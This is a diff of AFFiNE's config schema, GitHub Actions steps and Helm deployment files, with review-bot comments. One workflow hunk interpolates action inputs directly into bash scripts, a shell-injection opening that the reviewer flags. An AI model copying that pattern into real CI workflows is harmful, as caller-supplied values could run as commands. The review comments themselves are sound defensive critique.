}
},
"permission": {
"type": "object",
"description": "Configuration for permission module",
"properties": {
"readModel": {
"type": "string",
"description": "Permission data source for Rust evaluation\n@default \"projection\"\n@environment `AFFINE_PERMISSION_READ_MODEL`",
"default": "projection"
},
"fallbackLegacyLoader": {
"type": "boolean",
"description": "Fallback from projection loader to legacy loader when projection input loading fails\n@default false\n@environment `AFFINE_PERMISSION_FALLBACK_LEGACY_LOADER`",
"default": false
}
}
},
"storages": {
"type": "object",
"description": "Configuration for storages module",
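Review bot: `permission.readModel` is typed as a free-form `string`, so a misspelled `AFFINE_PERMISSION_READ_MODEL` passes schema validation and only surfaces inside the permission evaluator. Suggest an `enum` of the accepted values. The `fallbackLegacyLoader` description should also say what happens to the request when projection input loading fails and the fallback is off (the safe answer is deny), since this setting decides which data authorization decisions run on.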
@@ -341,7 +374,7 @@
"properties": {
"endpoint": {
"type": "string",
"description": "The S3 compatible endpoint. Example: \"https://s3.us-east-1.amazonaws.com\" or \"https://<account>.r2.cloudflarestorage.com\"."
"description": "The S3 compatible endpoint (used by aws-s3 provider). Optional; if omitted, endpoint is derived from region."
},
"region": {
"type": "string",
@@ -408,10 +441,6 @@
"type": "object",
"description": "The config for the S3 compatible storage provider.",
"properties": {
"endpoint": {
"type": "string",
"description": "The S3 compatible endpoint. Example: \"https://s3.us-east-1.amazonaws.com\" or \"https://<account>.r2.cloudflarestorage.com\"."
},
"region": {
"type": "string",
"description": "The region for the storage provider. Example: \"us-east-1\" or \"auto\" for R2."
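Review bot: Dropping `endpoint` from this provider's `properties` leaves existing configs that set it with a key the schema no longer describes, and the hunk does not show whether such a key is rejected or silently ignored. Suggest a validation error rather than a silent drop, plus a line in the upgrade notes, so a deployment does not end up talking to a different endpoint than the one the operator configured. The same removal is repeated for the other storage sections later in this file.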
@@ -461,6 +490,13 @@
"type": "string",
"description": "The account id for the cloudflare r2 storage provider."
},
"jurisdiction": {
"type": "string",
"enum": [
"eu"
],
"description": "Optional jurisdiction for the cloudflare r2 endpoint. Set to \"eu\" for EU buckets."
},
"usePresignedURL": {
"type": "object",
"description": "The presigned url config for the cloudflare r2 storage provider.",
@@ -536,7 +572,7 @@
"properties": {
"endpoint": {
"type": "string",
"description": "The S3 compatible endpoint. Example: \"https://s3.us-east-1.amazonaws.com\" or \"https://<account>.r2.cloudflarestorage.com\"."
"description": "The S3 compatible endpoint (used by aws-s3 provider). Optional; if omitted, endpoint is derived from region."
},
"region": {
"type": "string",
@@ -603,10 +639,6 @@
"type": "object",
"description": "The config for the S3 compatible storage provider.",
"properties": {
"endpoint": {
"type": "string",
"description": "The S3 compatible endpoint. Example: \"https://s3.us-east-1.amazonaws.com\" or \"https://<account>.r2.cloudflarestorage.com\"."
},
"region": {
"type": "string",
"description": "The region for the storage provider. Example: \"us-east-1\" or \"auto\" for R2."
@@ -656,6 +688,13 @@
"type": "string",
"description": "The account id for the cloudflare r2 storage provider."
},
"jurisdiction": {
"type": "string",
"enum": [
"eu"
],
"description": "Optional jurisdiction for the cloudflare r2 endpoint. Set to \"eu\" for EU buckets."
},
"usePresignedURL": {
"type": "object",
"description": "The presigned url config for the cloudflare r2 storage provider.",
@@ -843,11 +882,14 @@
"properties": {
"google": {
"type": "object",
"description": "Google Calendar integration config\n@default {\"enabled\":false,\"clientId\":\"\",\"clientSecret\":\"\",\"externalWebhookUrl\":\"\",\"webhookVerificationToken\":\"\"}\n@link https://developers.google.com/calendar/api/guides/push",
"description": "Google Calendar integration config\n@default {\"enabled\":false,\"allowNewAccounts\":true,\"clientId\":\"\",\"clientSecret\":\"\",\"externalWebhookUrl\":\"\",\"webhookVerificationToken\":\"\",\"requestTimeoutMs\":10000}\n@link https://developers.google.com/calendar/api/guides/push",
"properties": {
"enabled": {
"type": "boolean"
},
"allowNewAccounts": {
"type": "boolean"
},
"clientId": {
"type": "string"
},
@@ -859,14 +901,19 @@
},
"webhookVerificationToken": {
"type": "string"
},
"requestTimeoutMs": {
"type": "number"
}
},
"default": {
"enabled": false,
"allowNewAccounts": true,
"clientId": "",
"clientSecret": "",
"externalWebhookUrl": "",
"webhookVerificationToken": ""
"webhookVerificationToken": "",
"requestTimeoutMs": 10000
}
},
"caldav": {
@@ -969,24 +1016,35 @@
"description": "Whether to enable the copilot plugin. <br> Document: <a href=\"https://docs.affine.pro/self-host-affine/administer/ai\" target=\"_blank\">https://docs.affine.pro/self-host-affine/administer/ai</a>\n@default false",
"default": false
},
"scenarios": {
"byok.enabled": {
"type": "boolean",
"description": "Whether to enable workspace BYOK.\n@default true",
"default": true
},
"byok.allowedProviders": {
"type": "array",
"description": "The allowlist for workspace BYOK providers.\n@default [\"openai\",\"anthropic\",\"gemini\",\"fal\"]",
"default": [
"openai",
"anthropic",
"gemini",
"fal"
]
},
"byok.allowCustomEndpoint": {
"type": "boolean",
"description": "Whether workspace BYOK custom endpoints are accepted.\n@default false",
"default": false
},
"providers.profiles": {
"type": "array",
"description": "The profile list for copilot providers.\n@default []",
"default": []
},
"providers.defaults": {
"type": "object",
"description": "Use custom models in scenarios and override default settings.\n@default {\"override_enabled\":false,\"scenarios\":{\"audio_transcribing\":\"gemini-2.5-flash\",\"chat\":\"gemini-2.5-flash\",\"embedding\":\"gemini-embedding-001\",\"image\":\"gpt-image-1\",\"rerank\":\"gpt-4.1\",\"coding\":\"claude-sonnet-4-5@20250929\",\"complex_text_generation\":\"gpt-4o-2024-08-06\",\"quick_decision_making\":\"gpt-5-mini\",\"quick_text_generation\":\"gemini-2.5-flash\",\"polish_and_summarize\":\"gemini-2.5-flash\"}}",
"default": {
"override_enabled": false,
"scenarios": {
"audio_transcribing": "gemini-2.5-flash",
"chat": "gemini-2.5-flash",
"embedding": "gemini-embedding-001",
"image": "gpt-image-1",
"rerank": "gpt-4.1",
"coding": "claude-sonnet-4-5@20250929",
"complex_text_generation": "gpt-4o-2024-08-06",
"quick_decision_making": "gpt-5-mini",
"quick_text_generation": "gemini-2.5-flash",
"polish_and_summarize": "gemini-2.5-flash"
}
}
"description": "The default provider ids for model output types and global fallback.\n@default {}",
"default": {}
},
"providers.openai": {
"type": "object",
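Review bot: `byok.enabled` defaults to `true`, so an upgrade turns on workspace-supplied provider keys without the admin opting in; consider defaulting it to `false`, in line with `byok.allowCustomEndpoint`. `byok.allowedProviders` is an `array` with no `items` schema, so a misspelled provider id passes validation; an `items` enum of the supported ids would catch that. The description of `byok.allowCustomEndpoint` could also state that enabling it lets workspaces direct server-side requests to endpoints of their choosing.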
@@ -996,6 +1054,14 @@
"baseURL": "https://api.openai.com/v1"
}
},
"providers.cloudflareWorkersAi": {
"type": "object",
"description": "The config for the Cloudflare Workers AI provider.\n@default {\"apiToken\":\"\",\"accountId\":\"\"}",
"default": {
"apiToken": "",
"accountId": ""
}
},
"providers.fal": {
"type": "object",
"description": "The config for the fal provider.\n@default {\"apiKey\":\"\"}",
@@ -1046,13 +1112,6 @@
},
"default": {}
},
"providers.perplexity": {
"type": "object",
"description": "The config for the perplexity provider.\n@default {\"apiKey\":\"\"}",
"default": {
"apiKey": ""
}
},
"providers.anthropic": {
"type": "object",
"description": "The config for the anthropic provider.\n@default {\"apiKey\":\"\",\"baseURL\":\"https://api.anthropic.com/v1\"}",
@@ -1096,11 +1155,6 @@
},
"default": {}
},
"providers.morph": {
"type": "object",
"description": "The config for the morph provider.\n@default {}",
"default": {}
},
"unsplash": {
"type": "object",
"description": "The config for the unsplash key.\n@default {\"key\":\"\"}",
@@ -1159,7 +1213,7 @@
"properties": {
"endpoint": {
"type": "string",
"description": "The S3 compatible endpoint. Example: \"https://s3.us-east-1.amazonaws.com\" or \"https://<account>.r2.cloudflarestorage.com\"."
"description": "The S3 compatible endpoint (used by aws-s3 provider). Optional; if omitted, endpoint is derived from region."
},
"region": {
"type": "string",
@@ -1226,10 +1280,6 @@
"type": "object",
"description": "The config for the S3 compatible storage provider.",
"properties": {
"endpoint": {
"type": "string",
"description": "The S3 compatible endpoint. Example: \"https://s3.us-east-1.amazonaws.com\" or \"https://<account>.r2.cloudflarestorage.com\"."
},
"region": {
"type": "string",
"description": "The region for the storage provider. Example: \"us-east-1\" or \"auto\" for R2."
@@ -1279,6 +1329,13 @@
"type": "string",
"description": "The account id for the cloudflare r2 storage provider."
},
"jurisdiction": {
"type": "string",
"enum": [
"eu"
],
"description": "Optional jurisdiction for the cloudflare r2 endpoint. Set to \"eu\" for EU buckets."
},
"usePresignedURL": {
"type": "object",
"description": "The presigned url config for the cloudflare r2 storage provider.",
@@ -1353,22 +1410,6 @@
}
}
},
"customerIo": {
"type": "object",
"description": "Configuration for customerIo module",
"properties": {
"enabled": {
"type": "boolean",
"description": "Enable customer.io integration\n@default false",
"default": false
},
"token": {
"type": "string",
"description": "Customer.io token\n@default \"\"",
"default": ""
}
}
},
"oauth": {
"type": "object",
"description": "Configuration for oauth module",
@@ -1467,16 +1508,6 @@
"description": "Whether enable lifetime price and allow user to pay for it.\n@default true",
"default": true
},
"apiKey": {
"type": "string",
"description": "[Deprecated] Stripe API key. Use payment.stripe.apiKey instead.\n@default \"\"\n@environment `STRIPE_API_KEY`",
"default": ""
},
"webhookKey": {
"type": "string",
"description": "[Deprecated] Stripe webhook key. Use payment.stripe.webhookKey instead.\n@default \"\"\n@environment `STRIPE_WEBHOOK_KEY`",
"default": ""
},
"stripe": {
"type": "object",
"description": "Stripe sdk options and credentials\n@default {\"apiKey\":\"\",\"webhookKey\":\"\"}\n@link https://docs.stripe.com/api",
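Review bot: The removed top-level `apiKey` and `webhookKey` were the entries that carried `@environment` mappings for `STRIPE_API_KEY` and `STRIPE_WEBHOOK_KEY`, and the remaining `stripe` object description shown here lists no environment mapping. Please confirm those variables still populate `stripe.apiKey` and `stripe.webhookKey`, or call out the removal in the upgrade notes, so a deployment configured only through the environment does not come up with an empty webhook key.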
+2 -2
View File
@@ -3,6 +3,6 @@ contact_links:
- name: Something else?
url: https://github.com/toeverything/AFFiNE/discussions
about: Feel free to ask and answer questions over in GitHub Discussions
- name: AFFiNE Community Support
url: https://community.affine.pro
- name: AFFiNE Community Support (Discord)
url: https://affine.pro/redirect/discord
about: AFFiNE Community - a place to ask, learn and engage with others
+20
View File
@@ -0,0 +1,20 @@
self-hosted-runner:
# Labels of self-hosted runner in array of strings.
labels:
- win-signer
# Configuration variables in array of strings defined in your repository or
# organization. `null` means disabling configuration variables check.
# Empty array means no configuration variable is allowed.
config-variables: null
# Configuration for file paths. The keys are glob patterns to match to file
# paths relative to the repository root. The values are the configurations for
# the file paths. Note that the path separator is always '/'.
# The following configurations are available.
#
# "ignore" is an array of regular expression patterns. Matched error messages
# are ignored. This is similar to the "-ignore" command line option.
paths:
# .github/workflows/**/*.yml:
# ignore: []
+17 -4
View File
@@ -50,8 +50,21 @@ runs:
# https://github.com/tree-sitter/tree-sitter/issues/4186
# pass -D_BSD_SOURCE to clang to fix the tree-sitter build issue
run: |
echo "CC=clang -D_BSD_SOURCE" >> "$GITHUB_ENV"
echo "TARGET_CC=clang -D_BSD_SOURCE" >> "$GITHUB_ENV"
if [[ "${{ inputs.target }}" == "aarch64-unknown-linux-gnu" ]]; then
# napi cross-toolchain 1.0.3 headers miss AT_HWCAP2 in elf.h
echo "CC=clang -D_BSD_SOURCE -DAT_HWCAP2=26" >> "$GITHUB_ENV"
echo "TARGET_CC=clang -D_BSD_SOURCE -DAT_HWCAP2=26" >> "$GITHUB_ENV"
else
echo "CC=clang -D_BSD_SOURCE" >> "$GITHUB_ENV"
echo "TARGET_CC=clang -D_BSD_SOURCE" >> "$GITHUB_ENV"
fi
- name: Prepare cache key
id: cache-key
shell: bash
run: |
shared_key="$(printf '%s' "${{ inputs.target }}-${{ inputs.package }}" | tr -c 'A-Za-z0-9_.-' '-')"
echo "shared-key=$shared_key" >> "$GITHUB_OUTPUT"
- name: Cache cargo
uses: Swatinem/rust-cache@v2
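Review bot: `${{ inputs.target }}` and `${{ inputs.package }}` are expanded into the bash source of both `run:` blocks before the shell starts, so the `tr -c 'A-Za-z0-9_.-' '-'` filter in "Prepare cache key" only cleans the value after it has already been parsed as script text. Pass the inputs through `env:` (for example `TARGET: ${{ inputs.target }}` and `PACKAGE: ${{ inputs.package }}`) and reference `"$TARGET"` and `"$PACKAGE"` in the `[[ ... ]]` test and the `printf`, so a caller-supplied value containing shell metacharacters stays data.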
@@ -59,7 +72,7 @@ runs:
with:
workspaces: ${{ env.DEV_DRIVE_WORKSPACE }}
save-if: ${{ github.ref_name == 'canary' }}
shared-key: ${{ inputs.target }}-${{ inputs.package }}
shared-key: ${{ steps.cache-key.outputs.shared-key }}
env:
CARGO_HOME: ${{ env.DEV_DRIVE }}/.cargo
RUSTUP_HOME: ${{ env.DEV_DRIVE }}/.rustup
@@ -69,7 +82,7 @@ runs:
if: ${{ runner.os != 'Windows' }}
with:
save-if: ${{ github.ref_name == 'canary' }}
shared-key: ${{ inputs.target }}-${{ inputs.package }}
shared-key: ${{ steps.cache-key.outputs.shared-key }}
- name: Build
shell: bash
+19 -14
View File
@@ -25,30 +25,30 @@ const buildType = BUILD_TYPE || 'canary';
const isProduction = buildType === 'stable';
const isBeta = buildType === 'beta';
const isCanary = buildType === 'canary';
const isInternal = buildType === 'internal';
const isSpotEnabled = isBeta || isCanary;
const replicaConfig = {
stable: {
front: Number(process.env.PRODUCTION_FRONT_REPLICA) || 2,
graphql: Number(process.env.PRODUCTION_GRAPHQL_REPLICA) || 2,
doc: Number(process.env.PRODUCTION_DOC_REPLICA) || 2,
},
beta: {
front: Number(process.env.BETA_FRONT_REPLICA) || 1,
graphql: Number(process.env.BETA_GRAPHQL_REPLICA) || 1,
doc: Number(process.env.BETA_DOC_REPLICA) || 1,
},
canary: { front: 1, graphql: 1, doc: 1 },
canary: { front: 1, graphql: 1 },
};
const cpuConfig = {
beta: { front: '1', graphql: '1', doc: '1' },
canary: { front: '500m', graphql: '1', doc: '500m' },
beta: { front: '1', graphql: '1' },
canary: { front: '500m', graphql: '1' },
};
const memoryConfig = {
beta: { front: '1Gi', graphql: '1Gi', doc: '1Gi' },
canary: { front: '512Mi', graphql: '512Mi', doc: '512Mi' },
beta: { front: '2Gi', graphql: '1Gi' },
canary: { front: '512Mi', graphql: '512Mi' },
};
const createHelmCommand = ({ isDryRun }) => {
@@ -72,10 +72,12 @@ const createHelmCommand = ({ isDryRun }) => {
`--set-string global.indexer.endpoint="${AFFINE_INDEXER_SEARCH_ENDPOINT}"`,
`--set-string global.indexer.apiKey="${AFFINE_INDEXER_SEARCH_API_KEY}"`,
];
const cloudSqlNodeSelector = isBeta
? `{ \\"iam.gke.io/gke-metadata-server-enabled\\": \\"true\\", \\"cloud.google.com/gke-spot\\": \\"true\\" }`
: `{ \\"iam.gke.io/gke-metadata-server-enabled\\": \\"true\\" }`;
const serviceAnnotations = [
`--set-json front.serviceAccount.annotations="{ \\"iam.gke.io/gcp-service-account\\": \\"${APP_IAM_ACCOUNT}\\" }"`,
`--set-json graphql.serviceAccount.annotations="{ \\"iam.gke.io/gcp-service-account\\": \\"${APP_IAM_ACCOUNT}\\" }"`,
`--set-json doc.serviceAccount.annotations="{ \\"iam.gke.io/gcp-service-account\\": \\"${APP_IAM_ACCOUNT}\\" }"`,
].concat(
isProduction || isBeta || isInternal
? [
@@ -84,10 +86,17 @@ const createHelmCommand = ({ isDryRun }) => {
`--set-json front.services.renderer.annotations="{ \\"cloud.google.com/neg\\": \\"{\\\\\\"ingress\\\\\\": true}\\" }"`,
`--set-json graphql.service.annotations="{ \\"cloud.google.com/neg\\": \\"{\\\\\\"ingress\\\\\\": true}\\" }"`,
`--set-json cloud-sql-proxy.serviceAccount.annotations="{ \\"iam.gke.io/gcp-service-account\\": \\"${CLOUD_SQL_IAM_ACCOUNT}\\" }"`,
`--set-json cloud-sql-proxy.nodeSelector="{ \\"iam.gke.io/gke-metadata-server-enabled\\": \\"true\\" }"`,
`--set-json cloud-sql-proxy.nodeSelector="${cloudSqlNodeSelector}"`,
]
: []
);
const spotNodeSelector = `{ \\"cloud.google.com/gke-spot\\": \\"true\\" }`;
const spotScheduling = isSpotEnabled
? [
`--set-json front.nodeSelector="${spotNodeSelector}"`,
`--set-json graphql.nodeSelector="${spotNodeSelector}"`,
]
: [];
const cpu = cpuConfig[buildType];
const memory = memoryConfig[buildType];
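Review bot: `cloud-sql-proxy.nodeSelector` now takes `cloudSqlNodeSelector`, which for beta adds `cloud.google.com/gke-spot`, so a spot preemption on beta removes database connectivity for every service behind the proxy at once. Keep the proxy on on-demand nodes and limit spot placement to `front` and `graphql`. Note also that `nodeSelector` is a hard constraint: with `spotScheduling` set, beta and canary pods stay `Pending` when no spot node is available, so a preferred node affinity would degrade more gracefully.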
@@ -96,14 +105,12 @@ const createHelmCommand = ({ isDryRun }) => {
resources = resources.concat([
`--set front.resources.requests.cpu="${cpu.front}"`,
`--set graphql.resources.requests.cpu="${cpu.graphql}"`,
`--set doc.resources.requests.cpu="${cpu.doc}"`,
]);
}
if (memory) {
resources = resources.concat([
`--set front.resources.requests.memory="${memory.front}"`,
`--set graphql.resources.requests.memory="${memory.graphql}"`,
`--set doc.resources.requests.memory="${memory.doc}"`,
]);
}
@@ -142,10 +149,8 @@ const createHelmCommand = ({ isDryRun }) => {
`--set graphql.replicaCount=${replica.graphql}`,
`--set-string graphql.image.tag="${imageTag}"`,
`--set-string graphql.app.host="${primaryHost}"`,
`--set-string doc.image.tag="${imageTag}"`,
`--set-string doc.app.host="${primaryHost}"`,
`--set doc.replicaCount=${replica.doc}`,
...serviceAnnotations,
...spotScheduling,
...resources,
`--timeout 10m`,
flag,
+7 -7
View File
@@ -53,7 +53,7 @@ runs:
fi
- name: Setup Node.js
uses: actions/setup-node@v4
uses: actions/setup-node@v6
with:
node-version-file: '.nvmrc'
registry-url: https://npm.pkg.github.com
@@ -93,7 +93,7 @@ runs:
run: node -e "const p = $(yarn config cacheFolder --json).effective; console.log('yarn_global_cache=' + p)" >> $GITHUB_OUTPUT
- name: Cache non-full yarn cache on Linux
uses: actions/cache@v4
uses: actions/cache@v5
if: ${{ inputs.full-cache != 'true' && runner.os == 'Linux' }}
with:
path: |
@@ -105,7 +105,7 @@ runs:
# and the decompression performance on Windows is very terrible
# so we reduce the number of cached files on non-Linux systems by remove node_modules from cache path.
- name: Cache non-full yarn cache on non-Linux
uses: actions/cache@v4
uses: actions/cache@v5
if: ${{ inputs.full-cache != 'true' && runner.os != 'Linux' }}
with:
path: |
@@ -113,7 +113,7 @@ runs:
key: node_modules-cache-${{ github.job }}-${{ runner.os }}-${{ runner.arch }}-${{ steps.system-info.outputs.name }}-${{ steps.system-info.outputs.release }}-${{ steps.system-info.outputs.version }}
- name: Cache full yarn cache on Linux
uses: actions/cache@v4
uses: actions/cache@v5
if: ${{ inputs.full-cache == 'true' && runner.os == 'Linux' }}
with:
path: |
@@ -122,7 +122,7 @@ runs:
key: node_modules-cache-full-${{ runner.os }}-${{ runner.arch }}-${{ steps.system-info.outputs.name }}-${{ steps.system-info.outputs.release }}-${{ steps.system-info.outputs.version }}
- name: Cache full yarn cache on non-Linux
uses: actions/cache@v4
uses: actions/cache@v5
if: ${{ inputs.full-cache == 'true' && runner.os != 'Linux' }}
with:
path: |
@@ -154,7 +154,7 @@ runs:
# Note: Playwright's cache directory is hard coded because that's what it
# says to do in the docs. There doesn't appear to be a command that prints
# it out for us.
- uses: actions/cache@v4
- uses: actions/cache@v5
id: playwright-cache
if: ${{ inputs.playwright-install == 'true' }}
with:
@@ -189,7 +189,7 @@ runs:
run: |
echo "version=$(yarn why --json electron | grep -h 'workspace:.' | jq --raw-output '.children[].locator' | sed -e 's/@playwright\/test@.*://' | head -n 1)" >> $GITHUB_OUTPUT
- uses: actions/cache@v4
- uses: actions/cache@v5
id: electron-cache
if: ${{ inputs.electron-install == 'true' }}
with:
-1
View File
@@ -7,7 +7,6 @@ inputs:
ios-app-version:
description: 'iOS App Store Version (Optional, use App version if empty)'
required: false
type: string
runs:
using: 'composite'
steps:
+1 -1
View File
@@ -3,4 +3,4 @@ name: affine
description: AFFiNE cloud chart
type: application
version: 0.0.0
appVersion: "0.26.1"
appVersion: "0.26.3"
+1 -1
View File
@@ -3,7 +3,7 @@ name: doc
description: AFFiNE doc server
type: application
version: 0.0.0
appVersion: "0.26.1"
appVersion: "0.26.3"
dependencies:
- name: gcloud-sql-proxy
version: 0.0.0
@@ -1,16 +0,0 @@
1. Get the application URL by running these commands:
{{- if contains "NodePort" .Values.service.type }}
export NODE_PORT=$(kubectl get --namespace {{ .Release.Namespace }} -o jsonpath="{.spec.ports[0].nodePort}" services {{ include "doc.fullname" . }})
export NODE_IP=$(kubectl get nodes --namespace {{ .Release.Namespace }} -o jsonpath="{.items[0].status.addresses[0].address}")
echo http://$NODE_IP:$NODE_PORT
{{- else if contains "LoadBalancer" .Values.service.type }}
NOTE: It may take a few minutes for the LoadBalancer IP to be available.
You can watch the status of by running 'kubectl get --namespace {{ .Release.Namespace }} svc -w {{ include "doc.fullname" . }}'
export SERVICE_IP=$(kubectl get svc --namespace {{ .Release.Namespace }} {{ include "doc.fullname" . }} --template "{{"{{ range (index .status.loadBalancer.ingress 0) }}{{.}}{{ end }}"}}")
echo http://$SERVICE_IP:{{ .Values.service.port }}
{{- else if contains "ClusterIP" .Values.service.type }}
export POD_NAME=$(kubectl get pods --namespace {{ .Release.Namespace }} -l "app.kubernetes.io/name={{ include "doc.name" . }},app.kubernetes.io/instance={{ .Release.Name }}" -o jsonpath="{.items[0].metadata.name}")
export CONTAINER_PORT=$(kubectl get pod --namespace {{ .Release.Namespace }} $POD_NAME -o jsonpath="{.spec.containers[0].ports[0].containerPort}")
echo "Visit http://127.0.0.1:8080 to use your application"
kubectl --namespace {{ .Release.Namespace }} port-forward $POD_NAME 8080:$CONTAINER_PORT
{{- end }}
@@ -1,63 +0,0 @@
{{/*
Expand the name of the chart.
*/}}
{{- define "doc.name" -}}
{{- default .Chart.Name .Values.nameOverride | trunc 63 | trimSuffix "-" }}
{{- end }}
{{/*
Create a default fully qualified app name.
We truncate at 63 chars because some Kubernetes name fields are limited to this (by the DNS naming spec).
If release name contains chart name it will be used as a full name.
*/}}
{{- define "doc.fullname" -}}
{{- if .Values.fullnameOverride }}
{{- .Values.fullnameOverride | trunc 63 | trimSuffix "-" }}
{{- else }}
{{- $name := default .Chart.Name .Values.nameOverride }}
{{- if contains $name .Release.Name }}
{{- .Release.Name | trunc 63 | trimSuffix "-" }}
{{- else }}
{{- printf "%s-%s" .Release.Name $name | trunc 63 | trimSuffix "-" }}
{{- end }}
{{- end }}
{{- end }}
{{/*
Create chart name and version as used by the chart label.
*/}}
{{- define "doc.chart" -}}
{{- printf "%s-%s" .Chart.Name .Chart.Version | replace "+" "_" | trunc 63 | trimSuffix "-" }}
{{- end }}
{{/*
Common labels
*/}}
{{- define "doc.labels" -}}
helm.sh/chart: {{ include "doc.chart" . }}
{{ include "doc.selectorLabels" . }}
{{- if .Chart.AppVersion }}
app.kubernetes.io/version: {{ .Chart.AppVersion | quote }}
{{- end }}
app.kubernetes.io/managed-by: {{ .Release.Service }}
monitoring: enabled
{{- end }}
{{/*
Selector labels
*/}}
{{- define "doc.selectorLabels" -}}
app.kubernetes.io/name: {{ include "doc.name" . }}
app.kubernetes.io/instance: {{ .Release.Name }}
{{- end }}
{{/*
Create the name of the service account to use
*/}}
{{- define "doc.serviceAccountName" -}}
{{- if .Values.serviceAccount.create }}
{{- default (include "doc.fullname" .) .Values.global.docService.name }}
{{- else }}
{{- default "default" .Values.global.docService.name }}
{{- end }}
{{- end }}
@@ -1,118 +0,0 @@
apiVersion: apps/v1
kind: Deployment
metadata:
name: {{ include "doc.fullname" . }}
labels:
{{- include "doc.labels" . | nindent 4 }}
spec:
replicas: {{ .Values.replicaCount }}
selector:
matchLabels:
{{- include "doc.selectorLabels" . | nindent 6 }}
template:
metadata:
{{- with .Values.podAnnotations }}
annotations:
{{- toYaml . | nindent 8 }}
{{- end }}
labels:
{{- include "doc.selectorLabels" . | nindent 8 }}
spec:
{{- with .Values.imagePullSecrets }}
imagePullSecrets:
{{- toYaml . | nindent 8 }}
{{- end }}
serviceAccountName: {{ include "doc.serviceAccountName" . }}
containers:
- name: {{ .Chart.Name }}
image: "{{ .Values.image.repository }}:{{ .Values.image.tag | default .Chart.AppVersion }}"
imagePullPolicy: {{ .Values.image.pullPolicy }}
env:
- name: AFFINE_PRIVATE_KEY
valueFrom:
secretKeyRef:
name: "{{ .Values.global.secret.secretName }}"
key: key
- name: NODE_ENV
value: "{{ .Values.env }}"
- name: NODE_OPTIONS
value: "--max-old-space-size=4096"
- name: NO_COLOR
value: "1"
- name: DEPLOYMENT_TYPE
value: "{{ .Values.global.deployment.type }}"
- name: DEPLOYMENT_PLATFORM
value: "{{ .Values.global.deployment.platform }}"
- name: SERVER_FLAVOR
value: "doc"
- name: AFFINE_ENV
value: "{{ .Release.Namespace }}"
- name: DATABASE_PASSWORD
valueFrom:
secretKeyRef:
name: pg-postgresql
key: postgres-password
- name: DATABASE_URL
value: postgres://{{ .Values.global.database.user }}:$(DATABASE_PASSWORD)@{{ .Values.global.database.host }}:{{ .Values.global.database.port }}/{{ .Values.global.database.name }}
- name: REDIS_SERVER_ENABLED
value: "true"
- name: REDIS_SERVER_HOST
value: "{{ .Values.global.redis.host }}"
- name: REDIS_SERVER_PORT
value: "{{ .Values.global.redis.port }}"
- name: REDIS_SERVER_USER
value: "{{ .Values.global.redis.username }}"
- name: REDIS_SERVER_PASSWORD
valueFrom:
secretKeyRef:
name: redis
key: redis-password
- name: REDIS_SERVER_DATABASE
value: "{{ .Values.global.redis.database }}"
- name: AFFINE_INDEXER_SEARCH_PROVIDER
value: "{{ .Values.global.indexer.provider }}"
- name: AFFINE_INDEXER_SEARCH_ENDPOINT
value: "{{ .Values.global.indexer.endpoint }}"
- name: AFFINE_INDEXER_SEARCH_API_KEY
valueFrom:
secretKeyRef:
name: indexer
key: indexer-apiKey
- name: AFFINE_SERVER_PORT
value: "{{ .Values.global.docService.port }}"
- name: AFFINE_SERVER_SUB_PATH
value: "{{ .Values.app.path }}"
- name: AFFINE_SERVER_HOST
value: "{{ .Values.app.host }}"
- name: AFFINE_SERVER_HTTPS
value: "{{ .Values.app.https }}"
ports:
- name: http
containerPort: {{ .Values.global.docService.port }}
protocol: TCP
livenessProbe:
httpGet:
path: /info
port: http
initialDelaySeconds: {{ .Values.probe.initialDelaySeconds }}
timeoutSeconds: {{ .Values.probe.timeoutSeconds }}
readinessProbe:
httpGet:
path: /info
port: http
initialDelaySeconds: {{ .Values.probe.initialDelaySeconds }}
timeoutSeconds: {{ .Values.probe.timeoutSeconds }}
resources:
{{- toYaml .Values.resources | nindent 12 }}
{{- with .Values.nodeSelector }}
nodeSelector:
{{- toYaml . | nindent 8 }}
{{- end }}
{{- with .Values.affinity }}
affinity:
{{- toYaml . | nindent 8 }}
{{- end }}
{{- with .Values.tolerations }}
tolerations:
{{- toYaml . | nindent 8 }}
{{- end }}
@@ -1,12 +0,0 @@
{{- if .Values.serviceAccount.create -}}
apiVersion: v1
kind: ServiceAccount
metadata:
name: {{ include "doc.serviceAccountName" . }}
labels:
{{- include "doc.labels" . | nindent 4 }}
{{- with .Values.serviceAccount.annotations }}
annotations:
{{- toYaml . | nindent 4 }}
{{- end }}
{{- end }}
@@ -1,15 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: "{{ include "doc.fullname" . }}-test-connection"
labels:
{{- include "doc.labels" . | nindent 4 }}
annotations:
"helm.sh/hook": test
spec:
containers:
- name: wget
image: busybox
command: ['wget']
args: ['{{ include "doc.fullname" . }}:{{ .Values.global.docService.port }}']
restartPolicy: Never
+4 -1
View File
@@ -30,9 +30,12 @@ podSecurityContext:
fsGroup: 2000
resources:
requests:
limits:
cpu: '1'
memory: 4Gi
requests:
cpu: '1'
memory: 2Gi
probe:
initialDelaySeconds: 20
+1 -1
View File
@@ -3,7 +3,7 @@ name: front
description: AFFiNE front server
type: application
version: 0.0.0
appVersion: "0.26.1"
appVersion: "0.26.3"
dependencies:
- name: gcloud-sql-proxy
version: 0.0.0
@@ -25,6 +25,22 @@ spec:
serviceAccountName: {{ include "front.serviceAccountName" . }}
securityContext:
{{- toYaml .Values.podSecurityContext | nindent 8 }}
{{- with .Values.global.database.gcloud }}
{{- if .enabled }}
initContainers:
- name: wait-for-cloud-sql-proxy
image: busybox:1.36.1
imagePullPolicy: IfNotPresent
command:
- /bin/sh
- -ec
- |
until wget -q -T 2 -O /dev/null "http://{{ $.Values.global.database.host }}:9801/startup"; do
echo "waiting for cloud sql proxy to become ready"
sleep 2
done
{{- end }}
{{- end }}
containers:
- name: {{ .Chart.Name }}
image: "{{ .Values.image.repository }}:{{ .Values.image.tag | default .Chart.AppVersion }}"
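Review bot: the `until wget ...` loop in `wait-for-cloud-sql-proxy` has no attempt limit, so a wrong `global.database.host` or a proxy that never passes `/startup` leaves the pod in `Init` indefinitely instead of failing the rollout. Bound the loop and `exit 1` once the cap is reached. The init container also sets no `resources` or container-level `securityContext`, and port `9801` is hard-coded here and in the two graphql templates rather than read from values.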
@@ -88,8 +104,6 @@ spec:
value: "{{ .Values.app.host }}"
- name: AFFINE_SERVER_HTTPS
value: "{{ .Values.app.https }}"
- name: DOC_SERVICE_ENDPOINT
value: "http://{{ .Values.global.docService.name }}:{{ .Values.global.docService.port }}"
ports:
- name: http
containerPort: {{ .Values.app.port }}
@@ -98,12 +112,20 @@ spec:
httpGet:
path: /info
port: http
initialDelaySeconds: {{ .Values.probe.initialDelaySeconds }}
initialDelaySeconds: {{ default .Values.probe.initialDelaySeconds .Values.probe.liveness.initialDelaySeconds }}
